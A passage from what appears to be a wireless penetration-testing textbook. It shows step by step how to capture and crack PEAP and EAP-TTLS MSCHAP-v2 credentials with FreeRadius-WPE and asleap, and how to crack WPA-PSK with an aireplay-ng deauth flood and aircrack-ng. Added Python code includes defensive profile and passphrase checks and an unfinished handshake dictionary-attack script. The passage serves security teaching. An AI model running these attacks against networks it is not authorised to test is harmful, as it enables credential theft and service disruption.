        NT hash:           e18614f7c6811f043fbf54205e929052 
        password:          abcdefghi 





What just happened? 
We set up our Honeypot using FreeRadius-WPE. The enterprise client is mis-configured to 
not use certificate validation with PEAP. This allows us to present our own fake certificate to 
the client, which it gladly accepts. Once this happens, MSCHAP-v2, the inner authentication 
protocol, kicks in. As the client uses our fake certificate to encrypt the data, we are easily able 
to recover the username / challenge / response tuples. 





MSCHAP-v2 is prone to dictionary attacks. We use Asleap to crack the challenge / response 
pair as it seems to be based on a dictionary word. 





PEAP can be mis-configured in multiple ways. Even with certificate validation enabled, if the 
administrator does not list the authentic servers in the Connect to these servers list, the 
attacker can obtain a real certificate for another domain from any of the listed certifying 
authorities. This would still be accepted by the client. There are other variations of this 
attack possible as well. 


We would encourage the reader to explore the different possibilities in this section. 


Attacking EAP-TTLS 


In EAP-Tunneled Transport Layer Security (EAP-TTLS), the server authenticates itself with a 
certificate. The client can optionally use a certificate as well. Unfortunately, this does not have 
native support on Windows and we need to use third-party utilities. 


There are multiple inner authentication protocol options we can use with EAP-TTLS. The 
most common one is again MSCHAP-v2. 


As Windows does not natively support EAP-TTLS, we will use OS X in this demonstration. 


Time for action — cracking EAP-TTLS 


Follow the given instructions to get started: 


1. EAP-TTLS is also enabled by default in eap.conf. Let us start the Radius server and 
monitor the log file: 


        attrsfile = "/usr/local/etc/raddb/attrs.accounting_response" 
        key = "%{User-Name}" 


root@bt:~# tail -f /usr/local/var/log/radius/freeradius-server-wpe.log -n 0 





2. We connect the client and enter the credentials SecurityTube as the Username and 
demo12345 as the Password: 


The Wi-Fi network "SecurityTube" requires WPA2 enterprise credentials. 

Username: SecurityTube 
Password: ********* 

[ ] Show password 
[x] Remember this network 

Connecting... 

[Cancel] 





3. Immediately, the MSCHAP-v2 challenge / response appears in the log file: 


root@bt:~# tail -f /usr/local/var/log/radius/freeradius-server-wpe.log -n 0 
mschap: Tue Aug  2 04:09:11 2011 
        username: SecurityTube 
        challenge: 0f:18:77:8f:4c:02:c3:90 
        response: 12:ef:10:7e:70:35:12:95:4a:51:8e:5f:f2:e5:5e:39:6d:4a:ff:b7:41:87:14:76 





4. We again use Asleap to crack the password used. It is important to note that any 
password list you use must contain the password used by the user. In order to 
illustrate that, if this is not true, we will not be able to crack the password, 
we have deliberately ensured that the password is not there in the default list 
on BackTrack: 


root@bt:~# asleap -C 0f:18:77:8f:4c:02:c3:90 -R 12:ef:10:7e:70:35:12:95:4a:51:8e:5f:f2:e5:5e:39:6d:4a:ff:b7:41:87:14:76 -W list 
asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com> 
Using wordlist mode with "list". 
        hash bytes:        f37e 
        NT hash:           b486eb4a83bea2497df401405ba8f37e 
        password:          demo12345 








What just happened? 
Cracking EAP-TTLS is almost identical to PEAP. Once the client accepts our fake certificate, 
we get the MSCHAP-v2 challenge / response pair. As MSCHAP-v2 is prone to dictionary 
attacks, we use Asleap to crack the challenge / response pair as it seems to be based on a 
dictionary word. 





Have a go hero — EAP-TTLS 


We would encourage you to try attacks, similar to what we have suggested for PEAP against 
EAP-TTLS. 




Security best practices for Enterprises 


We have seen a ton of attacks against WPA/WPA2, both Personal and Enterprise. Based on 
our experience, we would recommend the following: 


1. For SOHOs and medium-sized businesses, use WPA2-PSK with a strong passphrase. 
You have up to 63 characters at your disposal. Make use of it. 


2. For large enterprises, use WPA2-Enterprise with EAP-TLS. This uses both client- and 
server-side certificates for authentication, and currently is unbreakable. 


3. If you have to use PEAP or EAP-TTLS with WPA2-Enterprise, then ensure that 
certificate validation is turned on, the right certifying authorities are chosen, only the 
Radius servers that are authorized are used and, finally, any setting that allows users 
to accept new Radius servers, certificates, or certifying authorities is turned off. 
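As an added illustration of recommendations 1 and 3 (and of the mis-configured PEAP profile shown earlier in the chapter), the following Python script, which is not from the book, checks a WPA2-PSK passphrase against the 8 to 63 printable-ASCII range and a strength threshold, and checks a supplicant profile modelled on the Windows Protected EAP Properties dialog for the settings listed above. The profile field names, the 80-bit threshold and the tiny deny-list are assumptions of the example.

```python
"""Check a WPA2-PSK passphrase and a PEAP/EAP-TTLS client profile against the
recommendations in this section.  Added example, not from the book; the profile
field names are modelled on the Windows 'Protected EAP Properties' dialog shown
earlier in the chapter, and the strength thresholds are local-policy
assumptions, not standards."""
import math
import string

# IEEE 802.11i: a PSK passphrase is 8 to 63 printable ASCII characters.
PSK_MIN, PSK_MAX = 8, 63
MIN_BITS = 80                      # assumption: local policy threshold
# Tiny constructed deny-list standing in for a real breached-password feed.
COMMON_PASSPHRASES = {"password", "12345678", "wirelesslab", "qwertyuiop"}


def estimate_bits(passphrase):
    """Rough strength estimate: length times log2 of the character pool used.
    This over-estimates dictionary phrases, so it is paired with a deny-list."""
    pool = 0
    if any(c in string.ascii_lowercase for c in passphrase):
        pool += 26
    if any(c in string.ascii_uppercase for c in passphrase):
        pool += 26
    if any(c in string.digits for c in passphrase):
        pool += 10
    if any(c in string.punctuation or c == " " for c in passphrase):
        pool += 33
    return len(passphrase) * math.log2(pool) if pool else 0.0


def check_psk_passphrase(passphrase):
    """Return a list of findings; empty means acceptable under this policy."""
    findings = []
    if not PSK_MIN <= len(passphrase) <= PSK_MAX:
        findings.append(f"length must be {PSK_MIN}-{PSK_MAX} characters")
    if any(not 32 <= ord(c) <= 126 for c in passphrase):
        findings.append("only printable ASCII (0x20-0x7E) is valid in a PSK passphrase")
    if passphrase.lower() in COMMON_PASSPHRASES:
        findings.append("passphrase is on the common-password list (dictionary attack)")
    if estimate_bits(passphrase) < MIN_BITS:
        findings.append(f"estimated strength below {MIN_BITS} bits; use more of the 63 characters")
    return findings


def check_eap_profile(profile):
    """Findings for a PEAP/EAP-TTLS supplicant profile (dict; keys are assumed)."""
    findings = []
    if not profile.get("validate_server_certificate"):
        findings.append("CRITICAL: server certificate validation is off; the client "
                        "will run MSCHAP-v2 inside a tunnel to any impostor RADIUS server")
        return findings            # the remaining checks are moot without validation
    if not profile.get("connect_to_servers"):
        findings.append("HIGH: no server names pinned; any certificate from a trusted "
                        "CA is accepted, including one issued for another domain")
    cas = profile.get("trusted_root_cas", [])
    if len(cas) != 1:
        findings.append("MEDIUM: trust exactly the CA that issued the RADIUS "
                        f"server certificate ({len(cas)} selected)")
    if profile.get("prompt_user_to_authorize_new_servers", True):
        findings.append("HIGH: users may accept new servers or CAs; disable the prompt")
    return findings


# The profile from the PEAP lab (validation off, public CAs ticked, no servers
# pinned) and a hardened one; both constructed for this example.
LAB_PROFILE = {
    "validate_server_certificate": False,
    "connect_to_servers": [],
    "trusted_root_cas": ["Class 3 Public Primary Certification Authority",
                         "GTE CyberTrust Global Root", "Microsoft Root Authority",
                         "Microsoft Root Certificate Authority", "Thawte Timestamping CA"],
    "prompt_user_to_authorize_new_servers": True,
}
HARDENED_PROFILE = {
    "validate_server_certificate": True,
    "connect_to_servers": ["radius.example.com"],      # placeholder server name
    "trusted_root_cas": ["Example Corp Issuing CA"],   # placeholder CA name
    "prompt_user_to_authorize_new_servers": False,
}

if __name__ == "__main__":
    for name, prof in (("lab", LAB_PROFILE), ("hardened", HARDENED_PROFILE)):
        print(name, check_eap_profile(prof) or ["no findings"])
    for pw in ("password", "Tr0ub4dor&3-is-not-enough-but-this-is"):
        print(repr(pw), check_psk_passphrase(pw) or ["acceptable"])
```

The profile check stops at the first CRITICAL finding because, with validation off, pinning servers or CAs changes nothing: the client never looks at the certificate it is given.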





Pop quiz — attacking WPA-Enterprise and RADIUS 


1. FreeRadius-WPE is a: 
a. Radius server written from scratch 
b. Patch to the FreeRadius server 
c. Ships by default on all Linuxes 
d. None of the above 


2. PEAP can be attacked using: 
a. Fake credentials 
b. Fake certificates 
c. Using WPA-PSK 
d. All of the above 


3. EAP-TLS uses: 
a. Client-side certificates 
b. Server-side certificates 
c. Either (a) or (b) 
d. Both (a) and (b) 


4. EAP-TTLS uses: 
a. Client-side certificates only 
b. Server-side certificates 
c. Password-based authentication 
d. LEAP 


Summary 


1. In this chapter, we saw how we could compromise the security of a WPA-Enterprise 
network running PEAP or EAP-TTLS, the two most common authentication 
mechanisms used in Enterprises. 


2. In the next chapter, we will look at how to put all that we have learned into use 
during an actual penetration test. 


"The Proof is in the Pudding." 


Popular Saying 
In the last eight chapters, we have covered a lot of ground. 


Now it's time to put all that learning to the test! 


In this chapter, we will learn how to conduct a WLAN penetration test using all the concepts 
we have learned. We will explore a client's network and then systematically conduct the 
penetration test in various stages. 




Wireless penetration testing methodology is no different from that of the wired world. The 
differences lie in the actual techniques used to conduct activities in the various phases. Those 
with some experience in wired-world penetration testing will feel right at home. For those 
who haven't, don't worry; you will pick this up very fast! 


Broadly, we can break up a wireless penetration testing exercise into the following phases: 


1. Planning phase 
2. Discovery phase 
3. Attack phase 
4. Reporting phase 


We will now look at each of these phases separately. 


WLAN Penetration Testing Methodology 


Planning 

In this phase, we understand the following: 

1. Scope of the assessment: The client employing the penetration tester will be the 
one to define the scope of the assessment. Typically, the following information 
is gathered: 
- Location of the penetration test 
- Total coverage area of the premises 
- Approximate number of access points and wireless clients deployed 
- Which wireless networks are included in the assessment? 
- Should a full proof of concept be done for each vulnerability, or should it just 
be reported? 

2. Effort estimation: Once the scope is clear, the penetration tester will have to do an 
effort estimation for the entire activity. This will consist of the following: 
- The number of days available for the penetration test 
- The number of man hours that may be required for the job 
- The depth of the penetration test based on the requirements 

3. Legality: Penetration tests are a serious affair and things can go terribly wrong at 
times. Hence, it is important to have an indemnity agreement in place, which ensures 
that the penetration tester or his company is not held liable for damages resulting 
from this test. Also, at times clients might require you to sign a Non Disclosure 
Agreement (NDA) to ensure that the data you gather and the results from the 
penetration test are private and cannot be disclosed to any third party. In addition, 
you must make yourself aware of local laws that might govern the allowed channels 
and power levels. It is important to ensure that no local laws are broken during the 
penetration test. 


Once all of the preceding is in place, we are ready to go! 


Discovery 


In this phase, we will scan the airspace and find different access points and clients in 
the vicinity. 


So, let's get started! 


Time for action — discovering wireless devices 


Follow the given instructions to get started: 


1. Create a monitor mode interface using your card as shown in the following screenshot: 


root@bt:~# ifconfig -a 
eth0      Link encap:Ethernet  HWaddr 08:00:27:1a:1f:c2 
          BROADCAST MULTICAST  MTU:1500  Metric:1 
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0 
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B) 

lo        Link encap:Local Loopback 
          inet addr:127.0.0.1  Mask:255.0.0.0 
          UP LOOPBACK RUNNING  MTU:16436  Metric:1 
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0 
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B) 

wlan0     Link encap:Ethernet  HWaddr 00:c0:ca:3e:bd:93 
          BROADCAST MUL
TICAST  MTU:1500  Metric:1 
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0 
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B) 

root@bt:~# ifconfig wlan0 up 
root@bt:~# airmon-ng start wlan0 

Interface       Chipset         Driver 

wlan0           RTL8187         rtl8187 - [phy0] 
                                (monitor mode enabled on mon0) 





2. Use airodump-ng to start scanning the airspace. Ensure that channel hopping 
happens across both the 802.11 b and g bands: 


root@bt:~# airodump-ng --band bg --cswitch 1 mon0 
3. Move around the premises to get as many clients and access points as possible: 


][ Elapsed: 52 s ][ 2011-04-28 10:32 

BSSID  PWR  Beacons  #Data, #/s  CH  MB    ENC  CIPHER  AUTH  ESSID 

        56            54    WPA   vivek 
       103            54e.  WPA   Wireless Lab 
        26            54e   WPA   Sunny 
                      -1    WPA   <length: 0> 
                      54 .  WPA   tata 

BSSID  STATION            PWR  Rate     Lost  Packets  Probes 

       C8:BC:C8:EE:12:0B       36 - 1     0       15  vivek 
       70:F1:A1:84:29:1A       54 -48     0        7 
       00:22:FB:35:FC:44       48e-12e    0       14  Vivek 
       60:FB:42:D5:E4:01        0 - 1e    0       29  Wireless Lab,Vivek 

root@bt:~# 





4. Request from the system administrator of the company a list of MAC addresses for 
all access points and wireless clients. This will help us in the next phase: 


CH 10 ][ Elapsed: 56 s ][ 2011-04-28 10:35 

BSSID  PWR  Beacons  #Data, #/s  CH  MB    ENC   CIPHER  AUTH  ESSID 

                                     -1    WPA                 <length: 0> 
                                     54e.  WPA                 Wireless Lab 
                                     54    WPA                 vivek 
                                     54 .  WEP                 brindavan 
                                     54 ,  WPA                 tata 
                                     54    OPN                 <length: 0> 
                                     54    WEP                 Airtel 
                                     54e   WPA                 Sunny 
                                     54    OPN                 <length: 0> 
                                     54    OPN                 <length: 0> 
                                     54e   WPA2                FinAirWifi 
                                     54    OPN                 <length: 0> 
                                     54    WEP                 Airtel 
                                     54    WEP                 Hissaria's 
                                     54    OPN                 <length: 0> 
                                     54    OPN                 <length: 0> 
                                     54e   WPA2  CCMP          New NETGEAR 
                                     -1    OPN                 <length: 0> 
                                     54    OPN                 <length: 0> 
                                     54    OPN                 <length: 0> 
                                     -1    OPN                 <length: 0> 
                                     -1    WPA                 <length: 0> 

BSSID              STATION            PWR  Rate     Lost  Packets  Probes 

(not associated)   C8:BC:C8:                                       vivek 
(not associated)   00:14:45: 
(not associated)   00:22:7F: 
00:21:91:D2:8E:25  00:22:FB:35:FC:         54e-54e                 Vivek 
00:21:91:D2:8E:25  60:FB:42:D5:E4:          0 - 1e                 Wireless Lab,Vivek 
00:1E:40:53:07:FC  70:F1:A1:84:29:         54 - 1 
40:4A:03:AB:EB:E2  70:E4:00:51:98:          0 - 1 
00:22:7F:25:0A:99  00:24:2B:64:DF:          1 - 0 
AC:67:06:32:AC:99  00:21:50:B1:B9:          1e- 0 

root@bt:~# 
We have now scanned the entire wireless airspace around the premises and have a clear picture of what is in the air. This is the starting point of the exercise; next we analyze this dump and carry out the actual attacks in the Attack phase.

Attack

Now that we understand what is in the airspace of the authorized network, we need to break the problem into smaller parts. In our attack phase, we will explore the following:

• Finding rogue access points
• Finding client mis-associations
• Cracking the encryption
• Finding unauthorized clients
• Breaking into the infrastructure
• Compromising clients

Finding rogue access points

The administrator has provided us with the list of MAC addresses of authorized clients and access points:

Authorized access point:

• ESSID: Wireless Lab
• MAC address: 00:21:91:D2:8E:25
• Configuration: WPA-PSK

Authorized clients:

• MAC address: 60:FB:42:D5:E4:01

We will now use this list to find rogue access points on the network.

Time for action — finding rogue access points

Follow the given instructions to get started:

1. We dump the list of all MAC addresses learned on the switches of the client's wired network. In the most common case, an access point's wired and wireless interfaces have MAC addresses that differ by 1 in the last octet. Two of the addresses found on the switches, 00:21:91:D2:8E:26 and 00:24:B2:24:7E:BF, are adjacent to BSSIDs we saw in the air.

2. These are close to the following access points (same scan as in the Discovery phase, 2011-04-28 10:35, sorted by signal strength; the BSSID column is not legible on the page): Wireless Lab (PWR -24, WPA TKIP PSK), vivek (-58, WPA), brindavan (-64, WEP), tata (-65, WPA), Airtel (-67, WEP), Sunny (-67, WPA), FinAirWifi (-68, WPA2 CCMP), Hissaria's (-69, WEP) and New NETGEAR (-70, WPA2 CCMP), plus a dozen hidden or open networks between -67 and -72 dBm.

3. Wireless Lab (00:21:91:D2:8E:25) is authorized, so its wired-side neighbour 00:21:91:D2:8E:26 on the switch is expected. The other switch address, 00:24:B2:24:7E:BF, is adjacent to the BSSID 00:24:B2:24:7E:BE of the access point with ESSID New NETGEAR, which is not on the administrator's list. This brings us to the conclusion that New NETGEAR, with wireless MAC address 00:24:B2:24:7E:BE and wired-side MAC address 00:24:B2:24:7E:BF, is a rogue device plugged into the corporate network:

Chapter 9 


The same table with the CIPHER column visible (2011-04-28 10:35, BSSID column not legible on the page) confirms that Wireless Lab, vivek, tata and Sunny run WPA with TKIP and PSK authentication, that brindavan, Airtel and Hissaria's are WEP, and that FinAirWifi and New NETGEAR are the only WPA2 (CCMP) networks in range.

4. We now use the switch's forwarding table to find out which physical port 00:24:B2:24:7E:BF is learned on (on a Cisco IOS switch, for instance, show mac address-table address 0024.b224.7ebf; other vendors have an equivalent) and remove the device from the corporate network.

What just happened?

We detected a rogue access point on the network using a simple MAC address matching technique. It is to be noted that this approach can be beaten (the attacker controls both the wired and the wireless MAC address of the rogue, and a rogue that is not bridged onto the switch leaves no wired trace at all), so it is not foolproof. In order to detect rogue access points deterministically, we will need to use wireless intrusion prevention systems, which use a variety of techniques, including sending crafted packets over the air and looking for them on the wired side, to detect rogue access points.


Finding unauthorized clients

One of the key concerns is an unauthorized client connecting to the corporate network. These may have been brought in by employees, or someone may have broken into the network. In this section, we will look at how to find unauthorized clients.

WLAN Penetration Testing Methodology 


Time for action — unauthorized clients

Follow the given instructions to get started:

1. We look at the client part of the airodump-ng output (some station MACs are cut off on the page):

 BSSID              STATION            PWR  Rate     Probes
 (not associated)   C8:BC:C8:EE:12:0B  -19           vivek
 (not associated)   00:14:45:AC:42:..  -62
 (not associated)   00:22:7F:28:23:..  -68           Mesh-320833000058-12
 00:21:91:D2:8E:25  00:22:FB:35:FC:44  -25  54e-54e  Vivek
 00:21:91:D2:8E:25  60:FB:42:D5:E4:01  -73   0 - 1e  Wireless Lab,Vivek
 00:1E:40:53:02:FC  70:F1:A1:84:29:1A  -48  54 - 1
 40:4A:03:AB:EB:E2  78:E4:00:51:98:..        0 - 1
 00:22:7F:25:0A:99  00:24:2B:64:DF:..  -1    1 - 0
 AC:67:06:32:AC:99  00:21:5C:81:B9:..  -1    1e- 0

2. Two stations are associated with the authorized access point 00:21:91:D2:8E:25. One of them, 60:FB:42:D5:E4:01, is on the administrator's list; the other is not. We can clearly see that a client with MAC address 00:22:FB:35:FC:44 is associated with the authorized access point even though it is not part of the corporate inventory.

3. This clearly allows us to locate unauthorized clients connected to the network. Note that the check only covers clients that were active while we were capturing on that channel, and that a client can spoof the MAC address of an authorized one, so a clean list here is not proof that none are present.






What just happened?

We used airodump-ng to find unauthorized clients connected to authorized access points. This points to the fact that either an authorized user is using a foreign client or an unauthorized user has managed to gain access to the network.
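The following is an added example, not code from the book or from the aircrack-ng project. It applies the three checks of the Discovery, rogue-access-point and unauthorized-client steps to the CSV that airodump-ng writes when run with --write: it counts the ENC values seen in the air, flags access points whose BSSID sits next to a MAC address dumped from the switches (the wired/wireless adjacency heuristic used above), and lists stations on the authorized BSSID that are missing from the administrator's list. The CSV and the switch dump are constructed: the authorized AP, its two stations, the New NETGEAR BSSID and the two switch MACs are the values from this chapter; the BSSIDs of the neighbouring networks, the timestamps and the third switch MAC are invented.

```python
"""Analyse an airodump-ng CSV dump against the administrator's asset list.

Added example for the Discovery, rogue-AP and unauthorized-client steps of
this chapter; not code from the book or the aircrack-ng project.
"""
import csv
import io

# Constructed sample in the layout airodump-ng writes to <prefix>-01.csv
# (run with --write <prefix>). The authorized AP, the two stations on it and
# the rogue AP's BSSID are the ones named in the chapter; the BSSIDs of the
# neighbouring networks, the timestamps and the third switch MAC are made up.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:21:91:D2:8E:25, 2011-04-28 10:32:01, 2011-04-28 10:35:10,  1,  54, WPA, TKIP, PSK, -24,  96,  30,   0.  0.  0.  0,  12, Wireless Lab, 
00:24:B2:24:7E:BE, 2011-04-28 10:32:05, 2011-04-28 10:35:09,  6,  54, WPA2, CCMP, PSK, -70,  40,   0,   0.  0.  0.  0,  11, New NETGEAR, 
AA:BB:CC:DD:EE:01, 2011-04-28 10:32:07, 2011-04-28 10:35:08, 11,  54, WPA, TKIP, PSK, -58,  50,   0,   0.  0.  0.  0,   5, vivek, 
AA:BB:CC:DD:EE:02, 2011-04-28 10:32:09, 2011-04-28 10:35:07,  3,  54, WEP, WEP, , -64,  30,   0,   0.  0.  0.  0,   9, brindavan, 
AA:BB:CC:DD:EE:03, 2011-04-28 10:32:11, 2011-04-28 10:35:06,  9,  54, OPN, , , -69,  20,   0,   0.  0.  0.  0,   0, , 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
60:FB:42:D5:E4:01, 2011-04-28 10:32:20, 2011-04-28 10:35:10, -73,  29, 00:21:91:D2:8E:25, Wireless Lab,Vivek
00:22:FB:35:FC:44, 2011-04-28 10:32:22, 2011-04-28 10:35:10, -25,  14, 00:21:91:D2:8E:25, Vivek
C8:BC:C8:EE:12:0B, 2011-04-28 10:32:25, 2011-04-28 10:35:09, -19,  15, (not associated), vivek
"""

# What the administrator handed over (page values) and what was dumped from
# the switches (the first two from the page, the last one constructed).
AUTHORIZED_APS = {"00:21:91:D2:8E:25"}
AUTHORIZED_CLIENTS = {"60:FB:42:D5:E4:01"}
SWITCH_MACS = ["00:21:91:D2:8E:26", "00:24:B2:24:7E:BF", "00:1A:2B:3C:4D:5E"]


def parse_airodump_csv(text):
    """Split airodump-ng's CSV into (access_points, stations).

    The file holds two comma-separated tables separated by a blank line and
    every field carries a leading space, so each field is stripped. Probed
    ESSIDs are themselves comma-separated, so a station row's tail is kept
    as a list.
    """
    aps, stations, section = [], [], None
    for row in csv.reader(io.StringIO(text)):
        row = [field.strip() for field in row]
        if not any(row):
            continue
        if row[0] == "BSSID":
            section = "ap"
            continue
        if row[0] == "Station MAC":
            section = "sta"
            continue
        if section == "ap":
            aps.append({"bssid": row[0].upper(), "channel": row[3],
                        "privacy": row[5], "cipher": row[6], "auth": row[7],
                        "power": int(row[8]), "essid": row[13]})
        elif section == "sta":
            bssid = row[5].upper() if ":" in row[5] else row[5]
            stations.append({"mac": row[0].upper(), "power": int(row[3]),
                             "bssid": bssid, "probes": [p for p in row[6:] if p]})
    return aps, stations


def summarize_encryption(aps):
    """Count networks per ENC value: the first thing to read off a scan."""
    counts = {}
    for ap in aps:
        counts[ap["privacy"]] = counts.get(ap["privacy"], 0) + 1
    return counts


def mac_to_int(mac):
    return int(mac.replace(":", "").replace("-", ""), 16)


def find_rogue_aps(aps, authorized_bssids, switch_macs, max_distance=1):
    """The chapter's heuristic: an AP seen in the air that is not on the
    authorized list, but whose BSSID is within max_distance of a MAC learned
    on the wired switches (same OUI), is probably bridged onto the LAN.
    max_distance=1 is the common case; some vendors space their interfaces
    further apart, one of the reasons the check is not foolproof."""
    authorized = {b.upper() for b in authorized_bssids}
    wired = {m.upper(): mac_to_int(m) for m in switch_macs}
    rogues = []
    for ap in aps:
        if ap["bssid"] in authorized:
            continue
        air = mac_to_int(ap["bssid"])
        for mac, value in wired.items():
            if mac[:8] == ap["bssid"][:8] and abs(air - value) <= max_distance:
                rogues.append({"bssid": ap["bssid"], "essid": ap["essid"],
                               "wired_mac": mac})
    return rogues


def find_unauthorized_clients(stations, authorized_bssids, authorized_clients):
    """Stations associated with an authorized BSSID that are not on the
    administrator's client list."""
    authorized = {b.upper() for b in authorized_bssids}
    allowed = {c.upper() for c in authorized_clients}
    return [st["mac"] for st in stations
            if st["bssid"] in authorized and st["mac"] not in allowed]


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    print("encryption in the air:", summarize_encryption(aps))
    for rogue in find_rogue_aps(aps, AUTHORIZED_APS, SWITCH_MACS):
        print("rogue AP candidate: {essid} {bssid} (wired side {wired_mac})".format(**rogue))
    for mac in find_unauthorized_clients(stations, AUTHORIZED_APS, AUTHORIZED_CLIENTS):
        print("unauthorized client on authorized AP:", mac)
```

To run it on a real scan, start airodump-ng with --write <prefix> (the Discovery scan above was run without it) and replace SAMPLE_CSV with the contents of <prefix>-01.csv; the switch dump comes from the forwarding tables, not from the air, so keep the two sources separate and let the adjacency check join them.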


Cracking the encryption

Now let's look at the authorized network and see if we can break the WPA network key. airodump-ng shows the network as WPA with TKIP and PSK authentication. With a pre-shared key the security of the whole network rests on one passphrase shared by every client, and the 4-way handshake that proves knowledge of it can be captured by anyone in range, so the passphrase can be attacked offline. Let us try a simple dictionary attack to check the strength of the passphrase chosen.

Time for action - cracking WPA

Follow the given instructions to get started:

1. Let us now run airodump-ng targeting the Wireless Lab access point by using a BSSID-based filter, locked to its channel and writing the capture to disk:

root@bt:~# airodump-ng --channel 1 --bssid 00:21:91:D2:8E:25 --write WPA-PSK mon0

2. airodump-ng starts collecting the packets and waits for the WPA handshake:

 CH  1 ][ Elapsed: 16 s ][ 2011-04-28 13:45

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:21:91:D2:8E:25  -29  96      149       30    1   1  54e. WPA  TKIP   PSK  Wireless Lab

 BSSID              STATION            PWR   Rate     Lost  Packets  Probes
 00:21:91:D2:8E:25  00:22:FB:35:FC:44  -20   48e-12e

3. Luckily, there is a connected client, so we can use a de-authentication attack to make it reconnect and speed things up:

root@bt:~# aireplay-ng --deauth 0 -a 00:21:91:D2:8E:25 mon0

13:46:01 Waiting for beacon frame (BSSID: 00:21:91:D2:8E:25) on channel 1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
13:46:02 Sending DeAuth to broadcast -- BSSID: [00:21:91:D2:8E:25]
(repeated)

A count of 0 makes aireplay-ng send de-authentication frames until it is stopped, which knocks every client off the network for as long as it runs. On an engagement, take aireplay-ng's own advice: target the client (-c 00:22:FB:35:FC:44), send a small burst (--deauth 5) and stop as soon as airodump-ng reports the handshake.
4. Now, we have captured a WPA handshake, as the top line of the airodump-ng window shows:

 CH  1 ][ Elapsed: 2 mins ][ 2011-04-28 13:47 ][ WPA handshake: 00:21:91:D2:8E:25

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:21:91:D2:8E:25  -35 100     1358      542   14   1  54e. WPA  TKIP   PSK  Wireless Lab

 BSSID              STATION            PWR   Rate     Lost  Packets  Probes
 00:21:91:D2:8E:25  00:22:FB:35:FC:44  -20   2e-48e      1      576

5. We start aircrack-ng to begin a dictionary attack on the handshake, giving it the BSSID, the wordlist and the capture file airodump-ng wrote:

root@bt:~# aircrack-ng -b 00:21:91:D2:8E:25 -w words WPA-PSK-01.cap

6. As the passphrase was easy, we were able to crack it using the dictionary, as shown in the following output (the key material is cut short on the page):

                        Aircrack-ng 1.1 r1738

 [00:00:00] 1 keys tested (118.33 k/s)

                     KEY FOUND! [ 12345678 ]

 Master Key     : EE F4 D4 7C ... D4 EF 5C AA ...
 Transient Key  : 68 B0 5A 61 ... B0 CE AF 93 ... 7A 9A EB A4 ... 1C 4D E2 3F ...
 EAPOL HMAC     : 63 20 99 FB ...

root@bt:~#

What just happened?

Even though WPA-PSK can be made practically unbreakable by choosing a strong passphrase (the attack is offline and the only cost per guess is the PBKDF2 derivation of the key, so its only real limit is how guessable the passphrase is), the administrators of this network made the critical mistake of choosing an easy-to-remember passphrase. This led to the compromise of the network using a simple dictionary-based attack.
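The following is an added example, not code from the book or from aircrack-ng, of what aircrack-ng does for every word in the dictionary: derive the PMK from the candidate passphrase and the ESSID with PBKDF2, expand it to the PTK with the two MAC addresses and the two nonces from the handshake, and check whether the KCK reproduces the MIC on the client's EAPOL-Key message. Since the page's capture file is not available, build_handshake constructs message 2 of the handshake with made-up nonces and MICs it with the passphrase 12345678 for ESSID Wireless Lab; AP_MAC and CLIENT_MAC are the addresses from this section. The PBKDF2 step is checked against the published IEEE 802.11i test vector (passphrase "password", SSID "IEEE").

```python
"""Dictionary attack against a captured WPA/WPA2-PSK 4-way handshake.

Added example; not code from the book or from aircrack-ng. It performs the
same per-candidate check aircrack-ng does: passphrase -> PMK -> PTK -> MIC,
compared with the MIC in the client's handshake message. The handshake here
is constructed (nonces, EAPOL frame) and MIC'd with the page's passphrase,
standing in for WPA-PSK-01.cap.
"""
import hashlib
import hmac

AP_MAC = bytes.fromhex("002191D28E25")      # Wireless Lab BSSID (page)
CLIENT_MAC = bytes.fromhex("0022FB35FC44")  # connected client (page)
ANONCE = bytes(range(32))                   # constructed nonces
SNONCE = bytes(range(32, 64))

# IEEE 802.11i Annex H.4.1 test vector for the PBKDF2 step.
IEEE_VECTOR = ("password", "IEEE",
               "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e")

MIC_OFFSET, MIC_LEN = 81, 16  # position of the MIC field inside an EAPOL-Key frame


def pmk_from_passphrase(passphrase, ssid):
    """PSK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 256 bits).
    These 4096 iterations are the only thing slowing a dictionary attack down."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def self_test():
    """True if the PBKDF2 step matches the IEEE test vector."""
    passphrase, ssid, expected = IEEE_VECTOR
    return pmk_from_passphrase(passphrase, ssid).hex() == expected


def prf(key, label, data, length):
    """802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i), i = 0, 1, ..."""
    out, i = b"", 0
    while len(out) < length:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:length]


def derive_ptk(pmk, ap_mac, client_mac, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of MACs and nonces).
    Everything except the PMK is sent in the clear, so a sniffer who guesses
    the PMK can compute the same PTK."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 64)


def eapol_mic(kck, eapol_frame):
    """MIC over the EAPOL-Key frame with its MIC field zeroed, keyed with the
    KCK (first 128 bits of the PTK). Key descriptor version 1 (WPA/TKIP) uses
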